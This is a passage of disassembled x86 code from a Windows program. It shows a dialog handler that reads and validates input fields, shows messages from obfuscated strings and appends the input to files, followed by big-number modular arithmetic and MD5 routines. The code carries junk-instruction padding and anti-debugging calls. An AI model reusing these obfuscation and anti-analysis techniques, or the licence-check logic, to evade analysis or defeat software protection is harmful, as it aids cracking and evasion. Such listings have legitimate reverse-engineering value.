call sub_40C428 ; SetFocus
loc_40AD34: ; CODE XREF: sub_40ACD5+52�j
mov [ebp+var_12], 4C4Ah
sub [ebp+var_12], 1DDAh
cmp ebx, ds:dword_41D920
jnz short loc_40AD53
push ds:dword_41D918
call sub_40C428 ; SetFocus
loc_40AD53: ; CODE XREF: sub_40ACD5+71�j
cmp ebx, ds:dword_41D918
jnz short loc_40AD66
push ds:dword_431E90
call sub_40C428 ; SetFocus
loc_40AD66: ; CODE XREF: sub_40ACD5+1B�j
; sub_40ACD5+26�j ...
and [ebp+var_4], 0
cmp ebx, ds:dword_431E90
jnz short loc_40AD7A
mov eax, ds:dword_41EAC4
mov [ebp+var_4], eax
loc_40AD7A: ; CODE XREF: sub_40ACD5+9B�j
lea edi, [ebp+var_9]
lea esi, byte_445A5B
xor ecx, ecx
inc ecx
rep movsb
cmp ebx, ds:dword_41D920
jnz short loc_40AD98
mov eax, ds:dword_41D91C
mov [ebp+var_4], eax
loc_40AD98: ; CODE XREF: sub_40ACD5+B9�j
mov [ebp+var_5], 67h
add [ebp+var_5], 1
cmp ebx, ds:dword_41076C
jnz short loc_40ADB0
mov eax, ds:dword_40DFBC
mov [ebp+var_4], eax
loc_40ADB0: ; CODE XREF: sub_40ACD5+D1�j
mov [ebp+var_8], 6975h
add [ebp+var_8], 5422h
cmp ebx, ds:dword_41D918
jnz short loc_40ADCC
mov eax, ds:dword_413C94
mov [ebp+var_4], eax
loc_40ADCC: ; CODE XREF: sub_40ACD5+ED�j
call sub_40C2B4 ; IsDebuggerPresent
cmp [ebp+var_4], 0
jz short loc_40ADEB
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push ebx
push [ebp+var_4]
call sub_40C53C ; CallWindowProcA
jmp short loc_40ADF0
; ---------------------------------------------------------------------------
loc_40ADEB: ; CODE XREF: sub_40ACD5+100�j
call sub_40C188 ; GetCurrentProcessId
loc_40ADF0: ; CODE XREF: sub_40ACD5+114�j
pop edi
pop esi
pop ebx
leave
retn 10h
sub_40ACD5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40ADF7 proc near ; DATA XREF: sub_40A4E2+449�o
var_26B = byte ptr -26Bh
var_26A = dword ptr -26Ah
var_266 = dword ptr -266h
var_262 = dword ptr -262h
var_25E = dword ptr -25Eh
var_25A = dword ptr -25Ah
var_256 = dword ptr -256h
var_252 = dword ptr -252h
var_24E = dword ptr -24Eh
var_24A = byte ptr -24Ah
var_249 = byte ptr -249h
var_244 = dword ptr -244h
var_240 = dword ptr -240h
var_23C = byte ptr -23Ch
var_237 = byte ptr -237h
var_138 = byte ptr -138h
var_133 = byte ptr -133h
var_12D = byte ptr -12Dh
var_126 = dword ptr -126h
var_122 = dword ptr -122h
var_11E = word ptr -11Eh
var_11C = dword ptr -11Ch
var_118 = dword ptr -118h
var_114 = byte ptr -114h
var_113 = byte ptr -113h
var_112 = word ptr -112h
var_110 = word ptr -110h
var_10D = byte ptr -10Dh
var_10C = dword ptr -10Ch
var_106 = word ptr -106h
var_103 = byte ptr -103h
var_102 = byte ptr -102h
var_101 = byte ptr -101h
var_2 = word ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 26Ch
push ebx
push esi
push edi
mov ax, word_445A5C
mov [ebp+var_2], ax
mov eax, [ebp+arg_4]
cmp eax, 10h
jz loc_40AFEC
jg short loc_40AE29
cmp eax, 2
jz loc_40AFD2
jmp loc_40B66D
; ---------------------------------------------------------------------------
loc_40AE29: ; CODE XREF: sub_40ADF7+22�j
cmp eax, 111h
jz loc_40B0DC
cmp eax, 113h
jz short loc_40AE5B
cmp eax, 111h
jl loc_40B66D
cmp eax, 138h
jz loc_40B008
jmp loc_40B66D
; ---------------------------------------------------------------------------
call sub_40C194 ; GetCurrentThreadId
loc_40AE5B: ; CODE XREF: sub_40ADF7+42�j
call sub_40C194 ; GetCurrentThreadId
cmp dword_43B218, 0
jz loc_40AF71
call sub_40C218 ; GetTickCount
push 9
push offset aQuTXud ; "´Ÿ“¿’š•“„"
call sub_40129C
push eax
push dword_43B218
call sub_408BEF
mov [ebp+var_240], eax
push 8
push offset aIaQvxv ; "µˆ€œŸ‚•‚"
call sub_40129C
push eax
push [ebp+var_240]
call sub_408BEF
add esp, 20h
mov [ebp+var_244], eax
lea edi, [ebp+var_24A]
lea esi, aE_2 ; "~ E- "
mov ecx, 3
rep movsw
lea eax, [ebp+var_25A]
push eax
push [ebp+var_244]
call sub_40C3F8 ; GetWindowRect
or eax, eax
jz loc_40AF71
call sub_40C188 ; GetCurrentProcessId
lea eax, [ebp+var_26A]
push eax
push ds:dword_41EBD4
call sub_40C3F8 ; GetWindowRect
or eax, eax
jz short loc_40AF71
mov eax, [ebp+var_252]
sub eax, [ebp+var_25A]
sub eax, 4
mov edx, [ebp+var_262]
sub edx, [ebp+var_26A]
cmp eax, edx
jnz short loc_40AF38
mov eax, [ebp+var_24E]
sub eax, [ebp+var_256]
sub eax, 4
mov edx, [ebp+var_25E]
sub edx, [ebp+var_266]
cmp eax, edx
jz short loc_40AF71
loc_40AF38: ; CODE XREF: sub_40ADF7+120�j
mov [ebp+var_26B], 28h
add [ebp+var_26B], 6Ah
push 1
mov eax, [ebp+var_24E]
sub eax, [ebp+var_256]
push eax
mov eax, [ebp+var_252]
sub eax, [ebp+var_25A]
push eax
push 0
push 0
push ds:dword_41EBD4
call sub_40C524 ; MoveWindow
loc_40AF71: ; CODE XREF: sub_40ADF7+70�j
; sub_40ADF7+E2�j ...
cmp dword_43B214, 0
jz loc_40B685
lea edi, [ebp+var_249]
lea esi, aZmm ; "ZmM&"
mov ecx, 5
rep movsb
mov eax, dword_43B214
mov dword_43B218, eax
mov [ebp+var_240], 87Eh
sub [ebp+var_240], 23C2h
and dword_43B214, 0
push eax
call sub_408C98
pop ecx
mov [ebp+var_244], 2DE6h
inc [ebp+var_244]
jmp loc_40B685
; ---------------------------------------------------------------------------
loc_40AFD2: ; CODE XREF: sub_40ADF7+27�j
mov eax, ds:dword_41B7D0
cmp [ebp+arg_0], eax
jnz loc_40B685
push 0
call sub_40C4F4 ; PostQuitMessage
jmp loc_40B685
; ---------------------------------------------------------------------------
loc_40AFEC: ; CODE XREF: sub_40ADF7+1C�j
mov eax, ds:dword_41B7D0
cmp [ebp+arg_0], eax
jnz short loc_40AFFE
push [ebp+arg_0]
call sub_40C518 ; DestroyWindow
loc_40AFFE: ; CODE XREF: sub_40ADF7+1FD�j
call sub_40C1B8 ; RtlGetLastWin32Error
jmp loc_40B685
; ---------------------------------------------------------------------------
loc_40B008: ; CODE XREF: sub_40ADF7+54�j
mov eax, [ebp+arg_C]
mov [ebp+var_11C], eax
cmp eax, ds:dword_431E88
jz short loc_40B045
cmp eax, ds:dword_413C98
jz short loc_40B045
cmp eax, ds:dword_41A6B4
jz short loc_40B045
cmp eax, ds:dword_434148
jz short loc_40B045
cmp eax, ds:dword_431E8C
jz short loc_40B045
cmp eax, ds:dword_43937C
jnz loc_40B685
loc_40B045: ; CODE XREF: sub_40ADF7+220�j
; sub_40ADF7+228�j ...
call sub_40C218 ; GetTickCount
mov eax, [ebp+var_11C]
cmp eax, ds:dword_431E8C
jz short loc_40B060
cmp eax, ds:dword_43937C
jnz short loc_40B06F
loc_40B060: ; CODE XREF: sub_40ADF7+25F�j
push 1010B0h
push [ebp+arg_8]
call sub_40C560 ; SetTextColor
jmp short loc_40B079
; ---------------------------------------------------------------------------
loc_40B06F: ; CODE XREF: sub_40ADF7+267�j
push 0
push [ebp+arg_8]
call sub_40C560 ; SetTextColor
loc_40B079: ; CODE XREF: sub_40ADF7+276�j
mov byte ptr [ebp+var_240+3], 68h
sub byte ptr [ebp+var_240+3], 8Fh
push 0FFFFFFh
push [ebp+arg_8]
call sub_40C554 ; SetBkColor
mov byte ptr [ebp+var_240+2], 0CEh
add byte ptr [ebp+var_240+2], 93h
and [ebp+var_252+2], 0
and [ebp+var_24E+2], 0
lea eax, [ebp+var_252+2]
push eax
call sub_40C56C ; CreateBrushIndirect
mov [ebp+var_244], eax
call sub_40C188 ; GetCurrentProcessId
mov eax, [ebp+var_244]
jmp loc_40B685
; ---------------------------------------------------------------------------
call sub_40C188 ; GetCurrentProcessId
jmp loc_40B685
; ---------------------------------------------------------------------------
loc_40B0DC: ; CODE XREF: sub_40ADF7+37�j
mov ax, word_445A69
mov [ebp+var_11E], ax
push 2
push offset aG ; "Õƒ"
call sub_40129C
push offset byte_432F80
push eax
lea edi, [ebp+var_237]
push edi
call sub_40C6B0
add esp, 14h
call sub_40C188 ; GetCurrentProcessId
push 0FFh
lea eax, [ebp+var_101]
push eax
push ds:dword_431E90
call sub_40C3EC ; GetWindowTextA
call sub_40C188 ; GetCurrentProcessId
cmp [ebp+var_101], 0
jnz short loc_40B190
mov [ebp+var_240], 7D06h
add [ebp+var_240], 5863h
push 1Fh
push offset aAXsgxGxXudIasv ; " œ•‘ƒ•ÜЃ•œ•“„еˆ€™‚‘„™ŸžÐ½Ÿž„˜"
call sub_40129C
add esp, 8
push 0
push 0
push eax
push 0
call sub_40C470 ; MessageBoxA
push ds:dword_431E90
call sub_40C428 ; SetFocus
mov word ptr [ebp+var_244+2], 0B5h
movzx eax, word ptr [ebp+var_244+2]
imul eax, 0C2Fh
mov word ptr [ebp+var_244+2], ax
jmp loc_40B685
; ---------------------------------------------------------------------------
loc_40B190: ; CODE XREF: sub_40ADF7+33B�j
push 5
push offset aGG_1 ; "ÕƒÐÕƒ"
call sub_40129C
lea edi, [ebp+var_101]
push edi
lea edi, [ebp+var_237]
push edi
push eax
lea edi, [ebp+var_237]
push edi
call sub_40C6B0
add esp, 18h
mov [ebp+var_106], 5E8Eh
movzx eax, [ebp+var_106]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_106], ax
push 0FFh
lea eax, [ebp+var_101]
push eax
push ds:dword_41D920
call sub_40C3EC ; GetWindowTextA
call sub_40C188 ; GetCurrentProcessId
cmp [ebp+var_101], 0
jnz short loc_40B24B
mov [ebp+var_240], 2605h
inc [ebp+var_240]
push 1Eh
push offset aAXsgxGxXudIa_0 ; " œ•‘ƒ•ÜЃ•œ•“„еˆ€™‚‘„™ŸžÐ©•‘‚"
call sub_40129C
add esp, 8
push 0
push 0
push eax
push 0
call sub_40C470 ; MessageBoxA
mov [ebp+var_244], 3322h
sub [ebp+var_244], 4451h
push ds:dword_41D920
call sub_40C428 ; SetFocus
jmp loc_40B685
; ---------------------------------------------------------------------------
loc_40B24B: ; CODE XREF: sub_40ADF7+403�j
push 5
push offset aGG_2 ; "ÕƒÝÕƒ"
call sub_40129C
lea edi, [ebp+var_101]
push edi
lea edi, [ebp+var_237]
push edi
push eax
lea edi, [ebp+var_237]
push edi
call sub_40C6B0
add esp, 18h
push 0FFh
lea eax, [ebp+var_101]
push eax
push ds:dword_41D918
call sub_40C3EC ; GetWindowTextA
call sub_40C2B4 ; IsDebuggerPresent
cmp [ebp+var_101], 0
jz loc_40B3E9
mov [ebp+var_10C], 6C42h
inc [ebp+var_10C]
lea ecx, [ebp+var_101]
or eax, 0FFFFFFFFh
loc_40B2B7: ; CODE XREF: sub_40ADF7+4C5�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_40B2B7
cmp eax, 4
jb loc_40B3E9
mov [ebp+var_10D], 19h
sub [ebp+var_10D], 84h
mov [ebp+var_103], 0
jmp short loc_40B300
; ---------------------------------------------------------------------------
loc_40B2DE: ; CODE XREF: sub_40ADF7+522�j
movzx eax, [ebp+var_103]
mov al, [ebp+eax+var_101]
cmp al, 30h
jl short loc_40B2F4
cmp al, 39h
jle short loc_40B2F9
loc_40B2F4: ; CODE XREF: sub_40ADF7+4F7�j
jmp loc_40B3E9
; ---------------------------------------------------------------------------
loc_40B2F9: ; CODE XREF: sub_40ADF7+4FB�j
add [ebp+var_103], 1
loc_40B300: ; CODE XREF: sub_40ADF7+4E5�j
lea ecx, [ebp+var_101]
or eax, 0FFFFFFFFh
loc_40B309: ; CODE XREF: sub_40ADF7+517�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_40B309
movzx esi, [ebp+var_103]
cmp esi, eax
jb short loc_40B2DE
mov eax, dword_445A6B
mov [ebp+var_122], eax
mov [ebp+var_102], 0
jmp loc_40B3C8
; ---------------------------------------------------------------------------
loc_40B332: ; CODE XREF: sub_40ADF7+5EA�j
mov word ptr [ebp+var_240], 342Dh
inc word ptr [ebp+var_240]
mov byte ptr [ebp+var_244+3], 59h
add byte ptr [ebp+var_244+3], 0D3h
mov al, [ebp+var_102]
mov byte ptr [ebp+var_240+3], al
jmp short loc_40B387
; ---------------------------------------------------------------------------
loc_40B35E: ; CODE XREF: sub_40ADF7+5A9�j
movzx eax, byte ptr [ebp+var_240+3]
movsx eax, [ebp+eax+var_101]
movzx edx, [ebp+var_102]
movsx edx, [ebp+edx+var_101]
cmp eax, edx
jnz short loc_40B3A2
add byte ptr [ebp+var_240+3], 1
loc_40B387: ; CODE XREF: sub_40ADF7+565�j
lea ecx, [ebp+var_101]
or eax, 0FFFFFFFFh
loc_40B390: ; CODE XREF: sub_40ADF7+59E�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_40B390
movzx esi, byte ptr [ebp+var_240+3]
cmp esi, eax
jb short loc_40B35E
loc_40B3A2: ; CODE XREF: sub_40ADF7+587�j
call sub_40C224 ; GetVersion
movzx eax, byte ptr [ebp+var_240+3]
movzx edx, [ebp+var_102]
sub eax, edx
cmp eax, 3
jg short loc_40B3E9
call sub_40C1F4 ; GetProcessHeap
add [ebp+var_102], 1
loc_40B3C8: ; CODE XREF: sub_40ADF7+536�j
lea ecx, [ebp+var_101]
or eax, 0FFFFFFFFh
loc_40B3D1: ; CODE XREF: sub_40ADF7+5DF�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_40B3D1
movzx esi, [ebp+var_102]
cmp esi, eax
jb loc_40B332
jmp short loc_40B452
; ---------------------------------------------------------------------------
loc_40B3E9: ; CODE XREF: sub_40ADF7+4A1�j
; sub_40ADF7+4CA�j ...
mov eax, dword_43B094
add eax, 7C9h
push eax
call sub_40C638
push 35h
push offset aEustXDqSedsq_0 ; "¥ž‘’œ•Ð„ŸÐ‘…„˜Ÿ‚™Š•ÐÝй¾³¿¢¢µ³¤Ð ¹¾ÞÐ œ"...
call sub_40129C
mov [ebp+var_240], eax
push 13h
push offset aEustXDqSedsq_1 ; "¥ž‘’œ•Ð„ŸÐ‘…„˜Ÿ‚™Š•"
call sub_40129C
add esp, 14h
push 0
push eax
mov edi, [ebp+var_240]
push edi
push 0
call sub_40C470 ; MessageBoxA
call sub_40C188 ; GetCurrentProcessId
push ds:dword_41D918
call sub_40C428 ; SetFocus
mov [ebp+var_110], 1277h
sub [ebp+var_110], 3172h
jmp loc_40B685
; ---------------------------------------------------------------------------
loc_40B452: ; CODE XREF: sub_40ADF7+5F0�j
push 5
push offset aGG_1 ; "ÕƒÐÕƒ"
call sub_40129C
lea edi, [ebp+var_101]
push edi
lea edi, [ebp+var_237]
push edi
push eax
lea edi, [ebp+var_237]
push edi
call sub_40C6B0
add esp, 18h
mov eax, dword_445A6F
mov [ebp+var_126], eax
push 0
push 0
push 4
push 0
push 0
push 40000000h
push offset dword_41EAD0
call sub_40C2FC ; CreateFileA
mov [ebp+var_118], eax
call sub_40C1B8 ; RtlGetLastWin32Error
push 2
push 0
push 0
push [ebp+var_118]
call sub_40C32C ; SetFilePointer
lea edi, [ebp+var_12D]
lea esi, aFna@ ; "FnA@ :"
mov ecx, 7
rep movsb
lea ecx, [ebp+var_237]
or eax, 0FFFFFFFFh
loc_40B4D8: ; CODE XREF: sub_40ADF7+6E6�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_40B4D8
push 0
lea esi, [ebp+var_23C]
push esi
push eax
lea edi, [ebp+var_237]
push edi
push [ebp+var_118]
call sub_40C3B0 ; WriteFile
mov [ebp+var_112], 529Ah
movzx eax, [ebp+var_112]
imul eax, 37Dh
mov [ebp+var_112], ax
push 2
push offset word_445A8A
call sub_40129C
add esp, 8
push 0
lea edi, [ebp+var_23C]
push edi
mov edi, 14h
sub edi, dword_43B098
push edi
push eax
push [ebp+var_118]
call sub_40C3B0 ; WriteFile
call sub_40C2B4 ; IsDebuggerPresent
push [ebp+var_118]
call sub_40C1DC ; CloseHandle
lea edi, [ebp+var_133]
lea esi, a2z ; "<2Z !"
mov ecx, 6
rep movsb
push ds:dword_41EBD4
call sub_40C518 ; DestroyWindow
mov [ebp+var_113], 2Eh
movzx eax, [ebp+var_113]
imul eax, 3E50h
mov [ebp+var_113], al
push 0
push 0
push 4
push 0
push 0
push 40000000h
push offset dword_40F1F0
call sub_40C2FC ; CreateFileA
mov [ebp+var_118], eax
call sub_40C188 ; GetCurrentProcessId
push 2
push 0
push 0
push [ebp+var_118]
call sub_40C32C ; SetFilePointer
mov [ebp+var_114], 0F2h
movzx eax, [ebp+var_114]
imul eax, 31E1h
mov [ebp+var_114], al
lea ecx, byte_432F80
or eax, 0FFFFFFFFh
loc_40B5E8: ; CODE XREF: sub_40ADF7+7F6�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_40B5E8
mov edi, eax
push 0
lea esi, [ebp+var_23C]
push esi
push edi
push offset byte_432F80
push [ebp+var_118]
call sub_40C3B0 ; WriteFile
call sub_40C224 ; GetVersion
push 1
push offset byte_445A88
call sub_40129C
add esp, 8
push 0
lea edi, [ebp+var_23C]
push edi
mov edi, 8
sub edi, dword_43B094
push edi
push eax
push [ebp+var_118]
call sub_40C3B0 ; WriteFile
push [ebp+var_118]
call sub_40C1DC ; CloseHandle
lea edi, [ebp+var_138]
lea esi, aCFw ; "C-FW"
mov ecx, 5
rep movsb
push 5
push ds:dword_41C844
call sub_40C500 ; ShowWindow
jmp short loc_40B685
; ---------------------------------------------------------------------------
loc_40B66D: ; CODE XREF: sub_40ADF7+2D�j
; sub_40ADF7+49�j ...
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40C530 ; DefWindowProcA
jmp short loc_40B685
; ---------------------------------------------------------------------------
call sub_40C2B4 ; IsDebuggerPresent
loc_40B685: ; CODE XREF: sub_40ADF7+181�j
; sub_40ADF7+1D6�j ...
pop edi
pop esi
pop ebx
leave
retn 10h
sub_40ADF7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40B68C proc near ; CODE XREF: sub_406E3F+1A�p
; sub_406E3F+2F�p
jmp ds:dword_447340
sub_40B68C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40B698 proc near ; CODE XREF: sub_405409+C8�p
jmp ds:dword_44734C
sub_40B698 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40B6A4 proc near ; CODE XREF: sub_405409+16E�p
jmp ds:dword_447350
sub_40B6A4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40B6B0 proc near ; CODE XREF: sub_406A44+75�p
jmp ds:dword_44735C
sub_40B6B0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40B6BC proc near ; CODE XREF: sub_406A44+4A�p
jmp ds:dword_447360
sub_40B6BC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40B6C8 proc near ; CODE XREF: sub_406A44+37�p
jmp ds:dword_447364
sub_40B6C8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40B6D4 proc near ; CODE XREF: sub_4069C8+61�p
jmp ds:dword_447368
sub_40B6D4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B6E0 proc near ; CODE XREF: sub_408886+23�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
pusha
cld
mov edi, [ebp+arg_4]
mov eax, 1
stosd
mov ecx, 0Fh
dec eax
rep stosd
lea edi, dword_446AB4
mov esi, [ebp+arg_0]
mov ecx, 10h
rep movsd
mov edi, [ebp+arg_8]
call sub_40B7AB
xor edx, edx
loc_40B710: ; CODE XREF: sub_40B6E0+52�j
push edx
push ebx
mov eax, [ebp+arg_8]
bt [eax], edx
jnb short loc_40B722
mov edx, [ebp+arg_4]
call sub_40B73C
loc_40B722: ; CODE XREF: sub_40B6E0+38�j
lea edx, dword_446AB4
call sub_40B73C
pop ebx
pop edx
inc edx
cmp edx, ebx
jbe short loc_40B710
popa
pop ebp
retn 10h
sub_40B6E0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40B73C proc near ; CODE XREF: sub_40B6E0+3D�p
; sub_40B6E0+48�p
lea edi, dword_446A74
mov ecx, 10h
xor eax, eax
rep stosd
lea edi, dword_446AB4
call sub_40B7AB
loc_40B756: ; CODE XREF: sub_40B73C+5D�j
lea edi, dword_446A74
mov ecx, 10h
xor eax, eax
loc_40B763: ; CODE XREF: sub_40B73C+2C�j
rcl dword ptr [edi], 1
lea edi, [edi+4]
loop loc_40B763
call sub_40B7BC
bt dword_446AB4, ebx
jnb short loc_40B798
mov esi, edx
lea edi, dword_446A74
xor eax, eax
mov ecx, 10h
loc_40B787: ; CODE XREF: sub_40B73C+55�j
mov eax, [esi]
adc [edi], eax
lea esi, [esi+4]
lea edi, [edi+4]
loop loc_40B787
call sub_40B7BC
loc_40B798: ; CODE XREF: sub_40B73C+3A�j
dec ebx
jns short loc_40B756
mov edi, edx
lea esi, dword_446A74
mov ecx, 10h
rep movsd
retn
sub_40B73C endp
; =============== S U B R O U T I N E =======================================
sub_40B7AB proc near ; CODE XREF: sub_40B6E0+29�p
; sub_40B73C+15�p
mov ebx, 1FFh
loc_40B7B0: ; CODE XREF: sub_40B7AB+B�j
bt [edi], ebx
jb short locret_40B7B8
dec ebx
jnz short loc_40B7B0
locret_40B7B8: ; CODE XREF: sub_40B7AB+8�j
retn
sub_40B7AB endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40B7BC proc near ; CODE XREF: sub_40B73C+2E�p
; sub_40B73C+57�p
lea esi, dword_446A74
mov edi, [ebp+14h]
mov ecx, 0Fh
loc_40B7CA: ; CODE XREF: sub_40B7BC+19�j
mov eax, [esi+ecx*4]
cmp eax, [edi+ecx*4]
jb short locret_40B7F3
ja short loc_40B7D7
dec ecx
jns short loc_40B7CA
loc_40B7D7: ; CODE XREF: sub_40B7BC+16�j
mov esi, [ebp+14h]
lea edi, dword_446A74
xor eax, eax
mov ecx, 10h
loc_40B7E7: ; CODE XREF: sub_40B7BC+35�j
mov eax, [esi]
sbb [edi], eax
lea esi, [esi+4]
lea edi, [edi+4]
loop loc_40B7E7
locret_40B7F3: ; CODE XREF: sub_40B7BC+14�j
retn
sub_40B7BC endp
; =============== S U B R O U T I N E =======================================
sub_40B7F4 proc near ; CODE XREF: sub_40B845+32�p
; sub_40B845+50�p ...
mov eax, ebx
and eax, ecx
push ebx
not ebx
and ebx, edx
or eax, ebx
pop ebx
retn
sub_40B7F4 endp
; =============== S U B R O U T I N E =======================================
sub_40B801 proc near ; CODE XREF: sub_40B845+219�p
; sub_40B845+238�p ...
mov eax, ebx
and eax, edx
push edx
not edx
and edx, ecx
or eax, edx
pop edx
retn
sub_40B801 endp
; =============== S U B R O U T I N E =======================================
sub_40B80E proc near ; CODE XREF: sub_40B845+420�p
; sub_40B845+43F�p ...
mov eax, ebx
xor eax, ecx
xor eax, edx
retn
sub_40B80E endp
; =============== S U B R O U T I N E =======================================
sub_40B815 proc near ; CODE XREF: sub_40B845+627�p
; sub_40B845+645�p ...
mov eax, edx
not eax
or eax, ebx
xor eax, ecx
retn
sub_40B815 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B81E proc near ; CODE XREF: sub_4088C3+8A�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
pusha
mov edi, [ebp+arg_0]
mov dword ptr [edi], 67452301h
mov dword ptr [edi+4], 0EFCDAB89h
mov dword ptr [edi+8], 98BADCFEh
mov dword ptr [edi+0Ch], 10325476h
popa
pop ebp
retn 4
sub_40B81E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B845 proc near ; CODE XREF: sub_4088C3+AC�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
pusha
mov edi, [ebp+arg_0]
mov esi, [ebp+arg_4]
mov eax, [edi]
mov dword_446AF4, eax
mov eax, [edi+4]
mov dword_446AF8, eax
mov eax, [edi+8]
mov dword_446AFC, eax
mov eax, [edi+0Ch]
mov dword_446B00, eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40B7F4
add eax, [edi]
add eax, [esi]
add eax, 0D76AA478h
rol eax, 7
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40B7F4
add eax, [edi+0Ch]
add eax, [esi+4]
add eax, 0E8C7B756h
rol eax, 0Ch
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40B7F4
add eax, [edi+8]
add eax, [esi+8]
add eax, 242070DBh
rol eax, 11h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40B7F4
add eax, [edi+4]
add eax, [esi+0Ch]
add eax, 0C1BDCEEEh
rol eax, 16h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40B7F4
add eax, [edi]
add eax, [esi+10h]
add eax, 0F57C0FAFh
rol eax, 7
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40B7F4
add eax, [edi+8]
add eax, [esi+18h]
add eax, 0A8304613h
rol eax, 11h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40B7F4
add eax, [edi+4]
add eax, [esi+1Ch]
add eax, 0FD469501h
rol eax, 16h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40B7F4
add eax, [edi]
add eax, [esi+20h]
add eax, 698098D8h
rol eax, 7
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40B7F4
add eax, [edi+0Ch]
add eax, [esi+24h]
add eax, 8B44F7AFh
rol eax, 0Ch
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40B7F4
add eax, [edi+8]
add eax, [esi+28h]
add eax, 0FFFF5BB1h
rol eax, 11h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40B7F4
add eax, [edi+4]
add eax, [esi+2Ch]
add eax, 895CD7BEh
rol eax, 16h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40B7F4
add eax, [edi]
add eax, [esi+30h]
add eax, 6B901122h
rol eax, 7
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40B7F4
add eax, [edi+0Ch]
add eax, [esi+34h]
add eax, 0FD987193h
rol eax, 0Ch
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40B7F4
add eax, [edi+8]
add eax, [esi+38h]
add eax, 0A679438Eh
rol eax, 11h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40B7F4
add eax, [edi+4]
add eax, [esi+3Ch]
add eax, 49B40821h
rol eax, 16h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40B801
add eax, [edi]
add eax, [esi+4]
add eax, 0F61E2562h
rol eax, 5
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40B801
add eax, [edi+0Ch]
add eax, [esi+18h]
add eax, 0C040B340h
rol eax, 9
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40B801
add eax, [edi+8]
add eax, [esi+2Ch]
add eax, 265E5A51h
rol eax, 0Eh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40B801
add eax, [edi+4]
add eax, [esi]
add eax, 0E9B6C7AAh
rol eax, 14h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40B801
add eax, [edi]
add eax, [esi+14h]
add eax, 0D62F105Dh
rol eax, 5
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
